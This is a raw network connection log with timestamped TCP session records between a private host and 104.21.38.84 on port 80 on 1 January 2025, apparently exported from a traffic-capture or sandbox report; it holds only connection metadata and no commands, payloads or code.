                                                                                                                  Jan 1, 2025 16:05:27.155904055 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.160290956 CET8062914104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.160350084 CET6291480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.160672903 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.160731077 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.160826921 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.165553093 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.518742085 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.523699999 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.626554966 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.674736977 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.812926054 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.860811949 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.938730955 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.939141989 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.943804979 CET8062915104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.943952084 CET8062916104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:27.946800947 CET6291580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.946800947 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.950764894 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:27.955640078 CET8062916104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.393834114 CET8062916104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.438957930 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.470381021 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.475203991 CET8062916104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.594006062 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.594655037 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.598931074 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.599003077 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.599184990 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.599647045 CET8062916104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.599692106 CET6291680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.603990078 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.735966921 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.741832018 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.741909027 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.742008924 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.746917963 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.954689980 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:28.959624052 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:28.959784985 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.047080994 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.095192909 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.095324993 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.100178003 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.186639071 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.235816002 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.306422949 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.360657930 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.360806942 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.407694101 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.481992006 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.482673883 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.482676029 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.487090111 CET8062917104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.487481117 CET8062919104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.487751007 CET8062918104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.487854004 CET6291780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.487857103 CET6291880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.487938881 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.488871098 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.493685007 CET8062919104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.845333099 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:29.850292921 CET8062919104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.941397905 CET8062919104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:29.985877037 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.213412046 CET8062919104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:30.267100096 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.341974020 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.346946955 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:30.350931883 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.351027966 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.355865955 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:30.705081940 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.710052013 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:30.814454079 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:30.860852957 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:30.992826939 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.048327923 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.201220036 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.202048063 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.206248045 CET8062920104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.206316948 CET6292080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.206808090 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.206867933 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.207065105 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.212321997 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.564040899 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.568984032 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.661983013 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.704591036 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.829778910 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.876446962 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.948786974 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.949275017 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.953756094 CET8062921104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.954143047 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:31.954229116 CET6292180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.954231024 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.954330921 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:31.959146023 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.298398972 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.303309917 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.403587103 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.454607964 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.577337980 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.626466990 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.709893942 CET6291980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.716506004 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.717061996 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.721487045 CET8062922104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.721571922 CET6292280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.721827984 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:32.721880913 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.721987009 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:32.727683067 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.080027103 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.085038900 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.186577082 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.235848904 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.443325043 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.502764940 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.562760115 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.562762022 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.567564011 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.567727089 CET8062923104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.568912029 CET6292380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.568922997 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.569016933 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.573779106 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:33.923412085 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:33.928304911 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.013921022 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.131295919 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.194873095 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.282710075 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.314765930 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.314773083 CET6292580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.317775965 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.319641113 CET8062925104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.319802046 CET8062924104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.320904016 CET6292580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.320905924 CET6292480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.322602987 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.326884985 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.326884985 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.331783056 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.438756943 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.443610907 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.444822073 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.444962025 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.449769020 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.673645973 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.678517103 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.678592920 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.781018972 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.798405886 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.803267002 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.897221088 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:34.938952923 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:34.978110075 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.070168972 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.076211929 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.126446009 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.188982964 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.201680899 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.201829910 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.202575922 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.206779957 CET8062926104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.206846952 CET6292680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.207077980 CET8062927104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.207130909 CET6292780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.207400084 CET8062928104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.207473040 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.207554102 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.212277889 CET8062928104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.566764116 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.571691990 CET8062928104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.651021957 CET8062928104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.706574917 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:35.932600021 CET8062928104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:35.986768007 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.062772989 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.067682981 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.067797899 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.068074942 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.072865963 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.423435926 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.428302050 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.513225079 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.579610109 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.770147085 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.888947964 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.889569044 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.894131899 CET8062929104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.894181967 CET6292980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.894459963 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:36.894520044 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.894772053 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:36.899601936 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.251614094 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.256525040 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.337799072 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.392081022 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.604108095 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.658777952 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.716684103 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.716689110 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.721549034 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.721647978 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.721694946 CET8062930104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:37.721767902 CET6293080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.722006083 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:37.726819038 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.080892086 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.085884094 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.201741934 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.376508951 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.481635094 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.588385105 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.608259916 CET6292880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.613317013 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.614068985 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.618382931 CET8062931104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.618431091 CET6293180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.619004011 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.619060993 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.619155884 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.623955011 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:38.971597910 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:38.976464987 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.091769934 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.183540106 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.272388935 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.322330952 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.405776024 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.406621933 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.410900116 CET8062932104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.410955906 CET6293280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.411446095 CET8062933104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.411530972 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.411699057 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.416507006 CET8062933104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.779568911 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:39.784564018 CET8062933104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.856790066 CET8062933104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:39.907794952 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.080794096 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.080799103 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.085751057 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.086026907 CET8062933104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.086112976 CET6293380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.086170912 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.086297989 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.091042995 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.199791908 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.204689026 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.205291986 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.209789038 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.214603901 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.439084053 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.443948030 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.444051027 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.539345026 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.564028025 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.568845034 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.603866100 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.670763969 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.710485935 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:40.720238924 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.827805996 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:40.957496881 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.001473904 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.076993942 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.077099085 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.077964067 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.082106113 CET8062934104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.082115889 CET8062935104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.082148075 CET6293480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.082173109 CET6293580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.082767010 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.082820892 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.082956076 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.087716103 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.439222097 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.444067001 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.624018908 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.677112103 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.788156986 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.832825899 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.875632048 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:41.923360109 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.996813059 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:41.997245073 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.001821041 CET8062936104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.002023935 CET6293680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.002078056 CET8062937104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.002182007 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.005111933 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.009965897 CET8062937104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.361124992 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.365936995 CET8062937104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.468096972 CET8062937104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.643018007 CET8062937104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.643066883 CET6293780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.808121920 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.812990904 CET8062938104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:42.813055992 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.813227892 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:42.818037987 CET8062938104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:43.157906055 CET6293880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:43.162822962 CET8062938104.21.38.84192.168.2.6
